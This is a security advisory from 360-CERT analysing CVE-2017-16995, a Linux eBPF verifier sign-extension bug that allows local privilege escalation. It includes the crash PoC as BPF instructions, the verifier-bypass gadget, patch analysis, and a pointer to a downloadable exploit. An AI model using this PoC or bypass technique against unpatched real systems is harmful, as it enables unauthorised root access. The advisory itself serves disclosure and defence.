CVE-2017-16995: Ubuntu Local Elevation of Privilege Analysis Report
Report No.: B6-2018-032101
Report Source: 360 CERT
Report author: 360 CERT
Updated on:
Vulnerability background
Recently, 360-CERT detected that attack code for the Linux kernel vulnerability CVE-2017-16995 had been released; it promptly issued a warning notice and continues to follow up. The vulnerability was first disclosed by Google Project Zero together with a PoC, and a privilege-escalation exploit was published on December 23, 2017 (see reference 8). The privilege-escalation code that appeared recently is a modified version of it.
BPF (Berkeley Packet Filter) is an architecture for filtering network packets; well-known tools such as tcpdump and Wireshark rely on it (see reference 2 for details). eBPF is an extension of BPF. In the Linux kernel implementation, however, a verifier bypass can lead to local elevation of privilege.
PoC analysis
Technical details
PoC overview
Analysis Environment:
Kernel: v4.14-rc1
Main code (see reference 6):
(1) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
(2) BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP), // fill r0 with pointer to map value
(3) BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
(4) BPF_MOV32_IMM(BPF_REG_ARG2, 1),
(5) BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
(6) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
(7) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
(8) BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
(9) BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
(10) BPF_EXIT_INSN(), // exit
(11) BPF_MOV32_IMM(BPF_REG_1, 0xffffffff), // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff
(12) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1), // r1 = 0x1'0000'0000, mistreated as 0
(13) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28), // r1 = 0x1000'0000'0000'0000, mistreated as 0
(14) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // compute noncanonical pointer
(15) BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),
(16) BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0), // crash by writing to noncanonical pointer
(17) BPF_MOV32_IMM(BPF_REG_0, 0), // terminate to make the verifier happy
(18) BPF_EXIT_INSN()
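For context, the mapfd loaded in instruction (1) refers to an ordinary BPF map created before the program is submitted. A minimal sketch of that setup is shown below; the map type mirrors what the PoC needs (a 4-byte key written at fp-4, key index 1), while value_size and max_entries are illustrative assumptions rather than values taken from the original PoC.

#include <linux/bpf.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Create an array map whose fd can be passed to BPF_LD_MAP_FD in the PoC. */
static int create_map(void)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type    = BPF_MAP_TYPE_ARRAY; /* array maps use 4-byte keys */
    attr.key_size    = 4;                  /* matches the key written at fp-4 */
    attr.value_size  = 8;                  /* assumed value size */
    attr.max_entries = 2;                  /* must cover key index 1 */

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}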
To understand why this code crashes, you need to understand how a BPF program is executed (see reference 2).
When a user submits BPF code, the kernel verifies it by simulating its execution, but performs no verification at run time.
The vulnerability is caused by the difference between simulated execution (during verification) and real execution.
Analyzing the program from these two angles makes the problem easy to find.
Simulated execution (verification) analysis (registers are represented as uint64_t; the immediate is an int32_t)
(11): 0xffffffff is placed into BPF_REG_1 (analysis of the code shows that, after sign extension, BPF_REG_1 is treated as 0xffff'ffff'ffff'ffff).
(12): BPF_REG_1 = BPF_REG_1 + 1. The addition overflows; since only the low 64 bits (the register width) are kept, BPF_REG_1 becomes 0.
(13): left shift; BPF_REG_1 remains 0.
(14): BPF_REG_1 is added to BPF_REG_0 (the map value address); since BPF_REG_1 is assumed to be 0, BPF_REG_0 is considered unchanged (this is what bypasses the subsequent address check).
(15), (16): write 0xdeadbeef into the map value. (The target address is checked for validity when the store is verified; from the analysis above, the verifier believes the address is still the valid map value address.)
The verifier (simulated execution) therefore accepts this BPF code, and it can be loaded into the kernel.
Real execution (BPF virtual machine) analysis (registers are represented as uint64_t; the immediate is converted to uint32_t)
(11): 0xffff'ffff (the immediate converted to uint32_t) is placed into the low 32 bits of BPF_REG_1 with no sign extension.
(12): BPF_REG_1 = BPF_REG_1 + 1, so BPF_REG_1 = 0x1'0000'0000 (again, note that at run time the register is a uint64_t).
(13): left shift; BPF_REG_1 = 0x1000'0000'0000'0000.
(14): BPF_REG_1 is added to BPF_REG_0 (the map value address); BPF_REG_0 now holds an invalid (noncanonical) pointer.
(15), (16): Illegal memory access and crash!
That is why the PoC crashes; a small user-space sketch of the diverging arithmetic follows.
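To make the divergence concrete, here is a small user-space sketch (plain C, not kernel code) of the arithmetic in instructions (11)-(13): the verifier sign-extends the 32-bit immediate, while the interpreter zero-extends it into the 64-bit register.

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    int32_t imm = 0xffffffff;                      /* bpf_insn.imm, i.e. -1 */

    /* Verifier's view: the immediate is sign-extended. */
    uint64_t r1_verifier = (uint64_t)(int64_t)imm; /* 0xffffffffffffffff */
    r1_verifier += 1;                              /* wraps around to 0 */
    r1_verifier <<= 28;                            /* still 0: "r0 stays valid" */

    /* Interpreter's view: mov32 zero-extends into the 64-bit register. */
    uint64_t r1_runtime = (uint32_t)imm;           /* 0x00000000ffffffff */
    r1_runtime += 1;                               /* 0x0000000100000000 */
    r1_runtime <<= 28;                             /* 0x1000000000000000 */

    printf("verifier thinks r1 = 0x%016llx\n", (unsigned long long)r1_verifier);
    printf("runtime value  r1 = 0x%016llx\n", (unsigned long long)r1_runtime);
    return 0;
}

Adding the runtime value of r1 to the map value pointer in r0 is what produces the noncanonical pointer that instruction (16) then writes to.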
Patch Analysis
The patch, provided by Jann Horn, fixes the sign-extension issue in the check_alu_op() function (see reference 1).
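A simplified paraphrase of the fixed "R = imm" path in check_alu_op(), reconstructed from the description below and the upstream commit in reference 1 (consult the commit for the exact diff):

    /* case: R = imm
     * remember the value we stored into this reg
     */
    regs[insn->dst_reg].type = SCALAR_VALUE;
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
        /* 64-bit mov: keeping the sign-extended immediate is correct */
        __mark_reg_known(regs + insn->dst_reg, insn->imm);
    } else {
        /* 32-bit mov: truncate to u32 so no sign extension leaks in */
        __mark_reg_known(regs + insn->dst_reg, (u32)insn->imm);
    }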
The principle is to truncate the 32-bit signed immediate to a 32-bit unsigned value before it is passed to __mark_reg_known(), so that it is not sign-extended. This can be checked with a small user-space program:
#include <stdio.h>
#include <stdint.h>

void __mark_reg_known(uint64_t imm)
{
    uint64_t reg = 0xffffffffffffffff;

    if (reg != imm)
        printf("360-CERT\n");
}

int main(void)
{
    int imm = 0xffffffff;

    __mark_reg_known((uint32_t)imm);
    return 0;
}
Because of the cast, no sign extension takes place, and the program prints 360-CERT.
Privilege-escalation exploit analysis
Experiment environment
Kernel version: 4.4.98
Vulnerability Principle
The root cause of this vulnerability is that the simulated execution results during verification are inconsistent with those of the BPF virtual machine.
This is essentially a sign-extension vulnerability. A simple program illustrates the cause:
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    int imm = -1;
    uint64_t dst = 0xffffffff;

    if (dst != imm) {
        printf("360 cert\n");
    }
    return 0;
}
During the comparison, imm is sign-extended to 0xffffffff'ffffffff, so the program prints 360 cert.
Technical details
A BPF program is submitted to the kernel with the bpf() system call, using the BPF_PROG_LOAD command. When a program is submitted, the kernel verifies its validity (simulated execution). However, verification only happens at load time, not at run time, so we can look for a way to slip malicious code past the verifier and have it executed later.
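For reference, a minimal sketch of handing a program to the verifier through the bpf() system call (error handling omitted; the wrapper name bpf_prog_load_sketch is just for illustration):

#include <linux/bpf.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static int bpf_prog_load_sketch(const struct bpf_insn *insns, int insn_cnt,
                                char *log, __u32 log_sz)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insns     = (__u64)(unsigned long)insns;
    attr.insn_cnt  = insn_cnt;
    attr.license   = (__u64)(unsigned long)"GPL";
    attr.log_buf   = (__u64)(unsigned long)log; /* receives the verifier log */
    attr.log_size  = log_sz;
    attr.log_level = 1;                         /* ask the verifier to emit a log */

    /* BPF_PROG_LOAD runs bpf_check()/do_check() before the fd is returned. */
    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}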
The verification process is as follows:
1. kernel/bpf/syscall.c: bpf_prog_load
2. kernel/bpf/verifier.c: bpf_check
3. kernel/bpf/verifier.c: do_check
The third function, do_check, verifies each BPF instruction. Analyzing it shows that it uses a form of branch pruning: a branch that the verifier concludes can never be taken is not verified at all (key point: we can place our malicious code on the branch the verifier believes is unreachable).
The conditional jump instruction is handled in:
kernel/bpf/verifier.c: check_cond_jmp_op
By analyzing this function, we can find that:
if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    regs[insn->dst_reg].type == CONST_IMM &&
    regs[insn->dst_reg].imm == insn->imm) {
    if (opcode == BPF_JEQ) {
        /* if (imm == imm) goto pc+off;
         * only follow the goto, ignore fall-through
         */
        *insn_idx += insn->off;
        return 0;
    } else {
        /* if (imm != imm) goto pc+off;
         * only follow fall-through branch, since
         * that's where the program will go
         */
        return 0;
    }
}
When a register is compared with an immediate under the "not equal" condition and static analysis finds the two values equal, the jump-target branch is not verified (this has to be read together with kernel/bpf/verifier.c: do_check). Consider the types used in the comparison between the register and the immediate.
Register Type:
struct reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == CONST_IMM | PTR_TO_STACK */
        int imm;

        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;
    };
};
The immediate's type is:
struct bpf_insn {
    __u8    code;       /* opcode */
    __u8    dst_reg:4;  /* dest register */
    __u8    src_reg:4;  /* source register */
    __s16   off;        /* signed offset */
    __s32   imm;        /* signed immediate constant */
};
Both are signed and of the same 32-bit width, so this comparison in the verifier causes no problem.
Now turn to the function in the BPF virtual machine that actually executes the instructions:
kernel/bpf/core.c: __bpf_prog_run
Analyzing this function, we find:
u64 regs[MAX_BPF_REG];
Registers are thus represented as u64, while the immediate is still the imm field of struct bpf_insn.
Looking at the code that handles the "jump if (not) equal to immediate" instructions (JMP_JEQ_K is shown; JMP_JNE_K is analogous):
#define DST regs[insn->dst_reg]
#define IMM insn->imm
...
    JMP_JEQ_K:
        if (DST == IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
Here a 64-bit unsigned value (DST) is compared with a 32-bit signed immediate (IMM), so the immediate is sign-extended.
We can therefore sneak malicious code past the verifier as follows:
(u32) r9 = (u32) -1
if r9 != 0xffff'ffff goto bad_code
r0 = 0
exit
bad_code:
    ...
When the code is submitted, the verifier's JNE analysis concludes that the jump can never be taken, so bad_code is never checked. At run time, however, the comparison evaluates to true, the jump is taken, and our malicious code executes.
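For illustration, the same gadget can be expressed with the BPF_* instruction macros used in the PoC earlier. This is only a sketch: the register choice and jump offset are assumptions, and the unverified payload itself is omitted.

    struct bpf_insn bypass[] = {
        /* (u32) r9 = (u32) -1; the verifier records imm = -1 */
        BPF_MOV32_IMM(BPF_REG_9, 0xffffffff),
        /* verifier: "r9 != 0xffffffff" can never hold, so the jump target
         * is never checked; interpreter: DST is 0x00000000ffffffff and IMM
         * sign-extends to 0xffffffffffffffff, so the jump IS taken */
        BPF_JMP_IMM(BPF_JNE, BPF_REG_9, 0xffffffff, 2),
        BPF_MOV32_IMM(BPF_REG_0, 0), /* fall-through path seen by the verifier */
        BPF_EXIT_INSN(),
        /* bad_code: unverified instructions would start here */
    };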
Download the exploit from reference 3. Before submitting the BPF code to the kernel, set the log_level field of union bpf_attr to 1 and fill in the other log fields appropriately. After the submission call returns, the verifier log is printed and shows which instructions were actually checked.
Only four instructions turn out to be verified, even though this exploit contains more than 30 instructions (the privilege-escalation payload).
Looking again at the code that causes the vulnerability (the comparison between a 64-bit unsigned register and a 32-bit signed immediate), we can see that at run time the exit path is skipped and bad_code is executed.
Timeline
The privilege-escalation attack code was made public on February 16.
360-CERT issued an alert notice.
360-CERT released this technical report.
References
1. https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f
2. https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html
3. http://cyseclabs.com/exploits/upstream44.c
4. https://sysprogs.com/VisualKernel/tutorials/setup/Ubuntu/
5. https://github.com/mrmacete/r2scripts/blob/master/bpf/README.md
6. https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3
7. https://github.com/iovisor/bpf-docs/blob/master/eBPF.md
8. https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c